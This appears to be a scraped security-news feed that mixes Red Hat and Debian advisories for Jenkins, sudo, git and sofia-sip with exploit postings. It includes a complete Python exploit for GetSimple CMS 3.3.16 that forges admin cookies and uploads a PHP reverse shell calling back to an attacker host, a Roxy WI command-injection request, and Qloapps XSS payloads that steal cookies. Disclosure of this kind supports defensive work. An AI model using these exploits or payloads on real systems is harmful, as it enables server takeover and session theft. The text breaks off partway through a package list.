An update for jenkins and jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.13.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2020-7692: PKCE support is not implemented in accordance with the RFC for OAuth 2.0 for Native Apps. Without the use of PKCE, the authorization code returned by an authorization server is not enough to guarantee that the client that issued the initial authorization request is the one that will be authorized. An attacker is able to obtain the authorization code using a malicious app on the client-side and use it to gain authorization to the protected resource. This affects the package com.google.oauth-client:google-oauth-client before 1.31.0.
* CVE-2021-4178: A arbitrary code execution flaw was found in the Fabric 8 Kubernetes client affecting versions 5.0.0-beta-1 and above. Due to an improperly configured YAML parsing, this will allow a local and privileged attacker to supply malicious YAML.
* CVE-2021-46877: A flaw was found in Jackson Databind. This issue may allow a malicious user to cause a denial of service (2 GB transient heap usage per read) in uncommon situations involving JsonNode JDK serialization.
* CVE-2022-22978: A flaw was found in Spring Security. When using RegexRequestMatcher, an easy misconfiguration can bypass some servlet containers. Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.
* CVE-2022-40151: A flaw was found in the XStream package. This flaw allows an attacker to cause a denial of service (DoS) in its target via XML serialization.
* CVE-2022-40152: A flaw was found in the  FasterXML/woodstox package. This flaw allows an attacker to cause a denial of service (DoS) in its target via XML serialization. An attacker may benefit from the parser sending a malicious input that may cause a crash. This vulnerability is only relevant for users making use of the DTD parsing functionality.
* CVE-2022-42889: A flaw was found in Apache Commons Text packages 1.5 through 1.9.  The affected versions allow an attacker to benefit from a variable interpolation process contained in Apache Commons Text, which can cause properties to be dynamically defined. Server applications are vulnerable to remote code execution (RCE) and unintentional contact with untrusted remote servers.
* CVE-2023-24422: A flaw was found in the script-security Jenkins Plugin. In affected versions of the script-security plugin, property assignments performed implicitly by the Groovy language runtime when invoking map constructors were not intercepted by the sandbox. This vulnerability allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.
* CVE-2023-24998: A flaw was found in Apache Commons FileUpload, where it does not limit the number of parts being processed in a request. This issue may allow an attacker to use a malicious upload or series of uploads to trigger a denial of service.
Red Hat Satellite does not include the affected Apache Tomcat, which bundles Commons FileUpload. However, Tomcat is shipped with Red Hat Enterprise Linux and consumed by the Candlepin component of Satellite. Red Hat Satellite users are therefore advised to check the impact state of Red Hat Enterprise Linux, since any necessary fixes will be distributed through the platform.
* CVE-2023-25761: A flaw was found in the Jenkins JUnit plugin. The affected versions of the JUnit Plugin do not escape test case class names in JavaScript expressions, resulting in a stored cross-site scripting (XSS) vulnerability. This may allow an attacker to control test case class names in the JUnit resources processed by the plugin.
* CVE-2023-25762: A flaw was found in the Jenkins pipeline-build-step plugin. Affected versions of the pipeline-build-step plugin do not escape job names in a JavaScript expression used in the Pipeline Snippet Generator. This can result in a stored cross-site scripting (XSS) vulnerability that may allow attackers to control job names.
* CVE-2023-27900: A flaw was found in Jenkins. Affected versions of Jenkins use the Apache Commons FileUpload library without specifying limits for the number of request parts introduced in version 1.5 for CVE-2023-24998 in hudson.util.MultipartFormDataParser, allowing attackers to trigger a denial of service.
* CVE-2023-27901: A flaw was found in Jenkins. Affected versions of Jenkins use the Apache Commons FileUpload library without specifying limits for the number of request parts introduced in version 1.5 for CVE-2023-24998 in org.kohsuke.stapler.RequestImpl, allowing attackers to trigger a denial of service.
* CVE-2023-27902: A flaw was found in Jenkins. Jenkins uses temporary directories adjacent to workspace directories, usually with the @tmp name suffix, to store temporary files related to the build. In pipelines, these temporary directories are adjacent to the current working directory when operating in a subdirectory of the automatically allocated workspace. Jenkins-controlled processes, like SCMs, may store credentials in these directories. Affected versions of Jenkins show these temporary directories when viewing job workspaces, which allows attackers with Item/Workspace permission to access their contents.
* CVE-2023-27904: A flaw was found in Jenkins. The affected version of Jenkins prints an error stack trace on agent-related pages when agent connections are broken. This stack trace may contain information about Jenkins configuration that is otherwise inaccessible to attackers.


Issued:

2023-05-24

Updated:

2023-05-24

**RHSA-2023:3299 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: jenkins and jenkins-2-plugins security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for jenkins and jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.13.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron.  

Security Fix(es):  

*   apache-commons-text: variable interpolation RCE (CVE-2022-42889)
*   google-oauth-client: missing PKCE support in accordance with the RFC for OAuth 2.0 for Native Apps can lead to improper authorization (CVE-2020-7692)
*   jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script Security Plugin (CVE-2023-24422)
*   kubernetes-client: Insecure deserialization in unmarshalYaml method (CVE-2021-4178)
*   jackson-databind: Possible DoS if using JDK serialization to serialize JsonNode (CVE-2021-46877)
*   springframework: Authorization Bypass in RegexRequestMatcher (CVE-2022-22978)
*   xstream: Xstream to serialise XML data was vulnerable to Denial of Service attacks (CVE-2022-40151)
*   woodstox-core: woodstox to serialise XML data was vulnerable to Denial of Service attacks (CVE-2022-40152)
*   Apache Commons FileUpload: FileUpload DoS with excessive parts (CVE-2023-24998)
*   jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin (CVE-2023-25761)
*   jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in Pipeline: Build Step Plugin (CVE-2023-25762)
*   Jenkins: Denial of Service attack (CVE-2023-27900)
*   Jenkins: Denial of Service attack (CVE-2023-27901)
*   Jenkins: Workspace temporary directories accessible through directory browser (CVE-2023-27902)
*   Jenkins: Information disclosure through error stack traces related to agents (CVE-2023-27904)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   OpenShift Developer Tools and Services 4.13 x86\_64
*   OpenShift Developer Tools and Services 4.13 s390x
*   OpenShift Developer Tools and Services 4.13 ppc64le
*   OpenShift Developer Tools and Services 4.13 aarch64

**Fixes**

*   BZ - 1856376 - CVE-2020-7692 google-oauth-client: missing PKCE support in accordance with the RFC for OAuth 2.0 for Native Apps can lead to improper authorization
*   BZ - 2034388 - CVE-2021-4178 kubernetes-client: Insecure deserialization in unmarshalYaml method
*   BZ - 2087606 - CVE-2022-22978 springframework: Authorization Bypass in RegexRequestMatcher
*   BZ - 2134291 - CVE-2022-40152 woodstox-core: woodstox to serialise XML data was vulnerable to Denial of Service attacks
*   BZ - 2134292 - CVE-2022-40151 xstream: Xstream to serialise XML data was vulnerable to Denial of Service attacks
*   BZ - 2135435 - CVE-2022-42889 apache-commons-text: variable interpolation RCE
*   BZ - 2164278 - CVE-2023-24422 jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script Security Plugin
*   BZ - 2170039 - CVE-2023-25761 jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin
*   BZ - 2170041 - CVE-2023-25762 jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in Pipeline: Build Step Plugin
*   BZ - 2172298 - CVE-2023-24998 Apache Commons FileUpload: FileUpload DoS with excessive parts
*   BZ - 2177630 - CVE-2023-27902 Jenkins: Workspace temporary directories accessible through directory browser
*   BZ - 2177634 - CVE-2023-27904 Jenkins: Information disclosure through error stack traces related to agents
*   BZ - 2177638 - CVE-2023-27900 Jenkins: Denial of Service attack
*   BZ - 2177646 - CVE-2023-27901 Jenkins: Denial of Service attack
*   BZ - 2185707 - CVE-2021-46877 jackson-databind: Possible DoS if using JDK serialization to serialize JsonNode
*   PITEAM-10 - Release 4.13 Jenkins agent image
*   PITEAM-9 - Release 4.13 Jenkins image

**CVEs**

*   CVE-2020-7692
*   CVE-2021-4178
*   CVE-2021-46877
*   CVE-2022-22978
*   CVE-2022-40151
*   CVE-2022-40152
*   CVE-2022-42889
*   CVE-2023-24422
*   CVE-2023-24998
*   CVE-2023-25761
*   CVE-2023-25762
*   CVE-2023-27900
*   CVE-2023-27901
*   CVE-2023-27902
*   CVE-2023-27904

**OpenShift Developer Tools and Services 4.13**

SRPM

jenkins-2-plugins-4.13.1684911916-1.el8.src.rpm

SHA-256: 8b78f1e0cc443705c0def991e4f0e23c250bb1184f3198c0266fa50312890fcd

jenkins-2.387.3.1684911776-3.el8.src.rpm

SHA-256: 2f4158f978c8982fbd36c865f80a847bc0bf339c46bf48b91657316407a4fa0a

x86\_64

jenkins-2-plugins-4.13.1684911916-1.el8.noarch.rpm

SHA-256: a73c34df114198ce2b81d117653cefc094c188e148f1cc295aede8f604e5c39f

jenkins-2.387.3.1684911776-3.el8.noarch.rpm

SHA-256: 27f26b7b0d116de88913498dd39f21f3c556387e8095b25ce678dac56e34ffc4

s390x

jenkins-2-plugins-4.13.1684911916-1.el8.noarch.rpm

SHA-256: a73c34df114198ce2b81d117653cefc094c188e148f1cc295aede8f604e5c39f

jenkins-2.387.3.1684911776-3.el8.noarch.rpm

SHA-256: 27f26b7b0d116de88913498dd39f21f3c556387e8095b25ce678dac56e34ffc4

ppc64le

jenkins-2-plugins-4.13.1684911916-1.el8.noarch.rpm

SHA-256: a73c34df114198ce2b81d117653cefc094c188e148f1cc295aede8f604e5c39f

jenkins-2.387.3.1684911776-3.el8.noarch.rpm

SHA-256: 27f26b7b0d116de88913498dd39f21f3c556387e8095b25ce678dac56e34ffc4

aarch64

jenkins-2-plugins-4.13.1684911916-1.el8.noarch.rpm

SHA-256: a73c34df114198ce2b81d117653cefc094c188e148f1cc295aede8f604e5c39f

jenkins-2.387.3.1684911776-3.el8.noarch.rpm

SHA-256: 27f26b7b0d116de88913498dd39f21f3c556387e8095b25ce678dac56e34ffc4

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:3299: Red Hat Security Advisory: jenkins and jenkins-2-plugins security update

Debian Linux Security Advisory 5410-1 - Multiple security issues were discovered in Sofia-SIP, a SIP User-Agent library, which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5410-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 24, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : sofia-sipCVE ID         : CVE-2022-31001 CVE-2022-31002 CVE-2022-31003 CVE-2022-47516                  CVE-2023-22741Multiple security issues were discovered in Sofia-SIP, a SIP User-Agentlibrary, which could result in denial of service.For the stable distribution (bullseye), these problems have been fixed inversion 1.12.11+20110422.1-2.1+deb11u1.We recommend that you upgrade your sofia-sip packages.For the detailed security status of sofia-sip please refer toits security tracker page at:https://security-tracker.debian.org/tracker/sofia-sipFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRt6GUACgkQEMKTtsN8TjbdIg/8DBVsizs1Bi1N65zEHRKfQ4wlq01lNnLMcEECsk/nBd44yZQJL1pudEBiSFmbcF6l4/oeUKvSo5RN1PBe9boVS+tq3ewAUyThZnrywRttFc09Atf3nQyhNaQz3+1SpqW2k6pTwB2+oilRRDITOorOrQM4hgvYxUhmhNmphNTQtEAbZHXYqAb3NaeKTWdKCfEdSthj0t4uOADcpS2XpK4jDR6ymjzPaIoenvYKV6JEVCo0qj1mSh7+K23dmWhV0WoQP2+W0xrZtkDx1SJHPEXfaQ2XXSuBUvyU351XqfWCTxrfBO3h1mlMrkRJmoSdyP9Pikkrm2bBATDjzl0vEpiWWnAtKaglRCJcBpbnIV7c3l2m61kY8osTZrYlKacRROyYUwpK8Q39l5i8shfCa4gbS+eZlQNjkFzTE8gpJDAmJi0FG2YEsN3E1u979AVnMkWMGe5qEYjybVNwl8OOJ/Ksl/sKsHbQ+s3IzSHwPRpSbHRYXIWTkGtJI3KJyyOpmSTdxBKY+YHmqGRhiOON8De+pcIlgn3LrCN92acRtK8vnQstDL+aNCuqUwY7wNiBrj4/JS4V8SuMn6zBeWDfLcbKYf3BLIsskYb6QuqAIssdNYUzCX4v8UTiiy2YuyBY/JDEutSTbn0ygQntur8BGpJiYHat6MffGhsw1knGhimoUkQ==q7se-----END PGP SIGNATURE-----

Debian Security Advisory 5410-1

Red Hat Security Advisory 2023-3276-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: sudo security update  
Advisory ID:       RHSA-2023:3276-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3276  
Issue date:        2023-05-23  
CVE Names:         CVE-2023-22809   
=====================================================================

1. Summary:

An update for sudo is now available for Red Hat Enterprise Linux 7.7  
Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update  
Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server E4S (v. 7.7) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server TUS (v. 7.7) - x86_64

3. Description:

The sudo packages contain the sudo utility which allows system  
administrators to provide certain users with the permission to execute  
privileged commands, which are used for system management purposes, without  
having to log in as root.

Security Fix(es):

* sudo: arbitrary file write with privileges of the RunAs user  
(CVE-2023-22809)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2161142 - CVE-2023-22809 sudo: arbitrary file write with privileges of the RunAs user

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.7):

Source:  
sudo-1.8.23-4.el7_7.4.src.rpm

x86_64:  
sudo-1.8.23-4.el7_7.4.x86_64.rpm  
sudo-debuginfo-1.8.23-4.el7_7.4.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
sudo-1.8.23-4.el7_7.4.src.rpm

ppc64le:  
sudo-1.8.23-4.el7_7.4.ppc64le.rpm  
sudo-debuginfo-1.8.23-4.el7_7.4.ppc64le.rpm

x86_64:  
sudo-1.8.23-4.el7_7.4.x86_64.rpm  
sudo-debuginfo-1.8.23-4.el7_7.4.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.7):

Source:  
sudo-1.8.23-4.el7_7.4.src.rpm

x86_64:  
sudo-1.8.23-4.el7_7.4.x86_64.rpm  
sudo-debuginfo-1.8.23-4.el7_7.4.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.7):

x86_64:  
sudo-debuginfo-1.8.23-4.el7_7.4.i686.rpm  
sudo-debuginfo-1.8.23-4.el7_7.4.x86_64.rpm  
sudo-devel-1.8.23-4.el7_7.4.i686.rpm  
sudo-devel-1.8.23-4.el7_7.4.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.7):

ppc64le:  
sudo-debuginfo-1.8.23-4.el7_7.4.ppc64le.rpm  
sudo-devel-1.8.23-4.el7_7.4.ppc64le.rpm

x86_64:  
sudo-debuginfo-1.8.23-4.el7_7.4.i686.rpm  
sudo-debuginfo-1.8.23-4.el7_7.4.x86_64.rpm  
sudo-devel-1.8.23-4.el7_7.4.i686.rpm  
sudo-devel-1.8.23-4.el7_7.4.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.7):

x86_64:  
sudo-debuginfo-1.8.23-4.el7_7.4.i686.rpm  
sudo-debuginfo-1.8.23-4.el7_7.4.x86_64.rpm  
sudo-devel-1.8.23-4.el7_7.4.i686.rpm  
sudo-devel-1.8.23-4.el7_7.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22809  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZG4WztzjgjWX9erEAQhvDA//a7zdxuDu2osHSQfgO7W3VrPSpvMcwQhT  
hCWJoZdTD1scqqa9ZgBhyhWDtWkQ/46TnUEa4+zuofVa8JfMg6DT/D7Rl6elpLaJ  
1oOlJLk+mnRai8CxbTzMBwevfIHdF1jdFxQkmhetSHMS2z0Nw73NmwyXuwNv3AYg  
mU/3IuL9ZiSX8eJ8xMuFNZ+G4QQvshXo6oqvv3fbnJ2YHGc1ezjqqp7byLIrcNm2  
Kq8lURZP1jBpvRedrPEOWqQfZN7NiE4AN5J5epcS1rlSSkzpYQhGxidJgjHnQK0M  
X18tkmRlHhLsIJK0dBK0gZJ6u72l2im1EwhMB1PweWUrGlyByfSed/2KHD1IPfxD  
TGwKqfFE7v4WMJULFxuS87QNp+lkz5xarUXS/Lv9t9IQkuaTorbWoEsPxXOUtz30  
mIlJXwixHgY9JQ8z3ABrSi0GPzuhnr2XcE69n3RuT9fz5+AX/nOWVM/mQdP1jsYd  
7Hk0WUR44dhvSNNmRmRik2q0m5WFn3hu+eo1dJ135iSYEZCNgGj26V8PKmithgz0  
MUfcUa8wAHw3nNq7Ytf9YarmRHpbonQtObzbYuPvGd1jd8Or/gg3tLOJBNX5Prg+  
EOErA+4dZ4kiOLj+L100j7/sqYgrJ0rdEGwQvQZkyh0kRdnwQ7JTVILJpkBXGtju  
0MP32q3pLe8=  
=drCU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3276-01

GetSimple CMS version 3.3.16 suffers from a remote shell upload vulnerability.

    # Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)# Data: 18/5/2023# Exploit Author : Youssef Muhammad# Vendor: Get-simple# Software Link:# Version app: 3.3.16# Tested on: linux# CVE: CVE-2022-41544import sysimport hashlibimport reimport requestsfrom xml.etree import ElementTreefrom threading import Threadimport telnetlibpurple = "\033[0;35m"reset = "\033[0m"yellow = "\033[93m"blue = "\033[34m"red = "\033[0;31m"def print_the_banner():    print(purple + ''' CCC V     V EEEE      22   000   22   22      4  4  11  5555 4  4 4  4 C    V     V E        2  2 0  00 2  2 2  2     4  4 111  5    4  4 4  4 C     V   V  EEE  ---   2  0 0 0   2    2  --- 4444  11  555  4444 4444 C      V V   E         2   00  0  2    2          4  11     5    4    4  CCC    V    EEEE     2222  000  2222 2222        4 11l1 555     4    4  '''+ reset)def get_version(target, path):    r = requests.get(f"http://{target}{path}admin/index.php")    match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text)    if match:        version = match.group(1)        if version <= "3.3.16":            print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544")        else:            print ("This is not vulnrable to this CVE")        return version    return Nonedef api_leak(target, path):    r = requests.get(f"http://{target}{path}data/other/authorization.xml")    if r.ok:        tree = ElementTree.fromstring(r.content)        apikey = tree[0].text        print(f"[+] apikey obtained {apikey}")        return apikey    return Nonedef set_cookies(username, version, apikey):    cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()    cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()    cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"    headers = {        'Content-Type':'application/x-www-form-urlencoded',        'Cookie': cookies    }    return headersdef get_csrf_token(target, path, headers):    r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)    m = re.search('nonce" type="hidden" value="(.*)"', r.text)    if m:        print("[+] csrf token obtained")        return m.group(1)    return Nonedef upload_shell(target, path, headers, nonce, shell_content):    upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"    payload = {        'content': shell_content,        'edited_file': '../shell.php',        'nonce': nonce,        'submitsave': 1    }    try:        response = requests.post(upload_url, headers=headers, data=payload)        if response.status_code == 200:            print("[+] Shell uploaded successfully!")        else:            print("(-) Shell upload failed!")    except requests.exceptions.RequestException as e:        print("(-) An error occurred while uploading the shell:", e)def shell_trigger(target, path):    url = f"http://{target}{path}/shell.php"    try:        response = requests.get(url)        if response.status_code == 200:            print("[+] Webshell trigged successfully!")        else:            print("(-) Failed to visit the page!")    except requests.exceptions.RequestException as e:        print("(-) An error occurred while visiting the page:", e)def main():    if len(sys.argv) != 5:        print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")        return    target = sys.argv[1]    path = sys.argv[2]    if not path.endswith('/'):        path += '/'    ip, port = sys.argv[3].split(':')    username = sys.argv[4]    shell_content = f"""<?php    $ip = '{ip}';    $port = {port};    $sock = fsockopen($ip, $port);    $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);    """    version = get_version(target, path)    if not version:        print("(-) could not get version")        return    apikey = api_leak(target, path)    if not apikey:        print("(-) could not get apikey")        return    headers = set_cookies(username, version, apikey)    nonce = get_csrf_token(target, path, headers)    if not nonce:        print("(-) could not get nonce")        return    upload_shell(target, path, headers, nonce, shell_content)    shell_trigger(target, path)if __name__ == '__main__':    print_the_banner()    main()

GetSimple CMS 3.3.16 Shell Upload

Roxy WI version 6.1.0.0 remote command execution exploit. This is a variant of the original disclosure of remote command execution in this version by Nuri Cilengir in April of 2023.

    # Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute# Exploit Author: Iyaad Luqman K# Application: Roxy WI <= v6.1.0.0# Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Tested on: Ubuntu 22.04# CVE : CVE-2022-31137# PoCPOST /app/options.py HTTP/1.1Host: 192.168.1.44User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 136Origin: https://192.168.1.44Referer: https://192.168.1.44/app/login.pyConnection: closeshow_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1

Roxy WI 6.1.0.0 Remote Command Execution

Webkul Qloapps version 1.5.2 suffers from a cross site scripting vulnerability.

# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)  
# Date: 15 May 2023  
# Exploit Author: Astik Rawat (ahrixia)  
# Vendor Homepage: https://qloapps.com/  
# Software Link: https://github.com/webkul/hotelcommerce  
# Version: 1.5.2  
# Tested on: Kali Linux 2022.4  
# CVE : CVE-2023-30256

Description:

A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.

Steps to exploit:  
1) Go to Signin page on the system.  
2) There are two parameters which can be exploited via XSS  
  - back  
  - email_create

2.1) Insert your payload in the "back"- GET and POST Request   
  Proof of concept (Poc):  
  The following payload will allow you to execute XSS - 

    Payload (Plain text):   
  xss onfocus=alert(1) autofocus= xss

  Payload (URL Encoded):   
  xss%20onfocus%3dalert(1)%20autofocus%3d%20xss

  Full GET Request (back):   
  [http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

2.2) Insert your payload in the "email_create" - POST Request Only  
  Proof of concept (Poc):  
  The following payload will allow you to execute XSS - 

  Payload (Plain text):   
  xss><img src=a onerror=alert(document.cookie)>xss

  Payload (URL Encoded):   
  xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss

  POST Request (email_create) (POST REQUEST DATA ONLY):   
  [controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]

Webkul Qloapps 1.5.2 Cross Site Scripting

Red Hat Security Advisory 2023-3263-01 - Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: git security update  
Advisory ID:       RHSA-2023:3263-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3263  
Issue date:        2023-05-23  
CVE Names:         CVE-2023-25652 CVE-2023-29007   
=====================================================================

1. Summary:

An update for git is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

Git is a distributed revision control system with a decentralized  
architecture. As opposed to centralized version control systems with a  
client-server model, Git ensures that each working copy of a Git repository  
is an exact copy with complete revision history. This not only allows the  
user to work on and contribute to projects without the need to have  
permission to push the changes to their official repositories, but also  
makes it possible for the user to work with no network connection.

Security Fix(es):

* git: by feeding specially crafted input to `git apply --reject`, a path  
outside the working tree can be overwritten with partially controlled  
contents (CVE-2023-25652)

* git: arbitrary configuration injection when renaming or deleting a  
section from a configuration file (CVE-2023-29007)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2188333 - CVE-2023-25652 git: by feeding specially crafted input to `git apply --reject`, a path outside the working tree can be overwritten with partially controlled contents  
2188338 - CVE-2023-29007 git: arbitrary configuration injection when renaming or deleting a section from a configuration file

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
gitk-1.8.3.1-25.el7_9.noarch.rpm  
gitweb-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-1.8.3.1-25.el7_9.noarch.rpm  
perl-Git-SVN-1.8.3.1-25.el7_9.noarch.rpm

x86_64:  
git-1.8.3.1-25.el7_9.x86_64.rpm  
git-daemon-1.8.3.1-25.el7_9.x86_64.rpm  
git-debuginfo-1.8.3.1-25.el7_9.x86_64.rpm  
git-gnome-keyring-1.8.3.1-25.el7_9.x86_64.rpm  
git-svn-1.8.3.1-25.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
git-1.8.3.1-25.el7_9.src.rpm

noarch:  
emacs-git-1.8.3.1-25.el7_9.noarch.rpm  
emacs-git-el-1.8.3.1-25.el7_9.noarch.rpm  
git-all-1.8.3.1-25.el7_9.noarch.rpm  
git-bzr-1.8.3.1-25.el7_9.noarch.rpm  
git-cvs-1.8.3.1-25.el7_9.noarch.rpm  
git-email-1.8.3.1-25.el7_9.noarch.rpm  
git-gui-1.8.3.1-25.el7_9.noarch.rpm  
git-hg-1.8.3.1-25.el7_9.noarch.rpm  
git-instaweb-1.8.3.1-25.el7_9.noarch.rpm  
git-p4-1.8.3.1-25.el7_9.noarch.rpm  
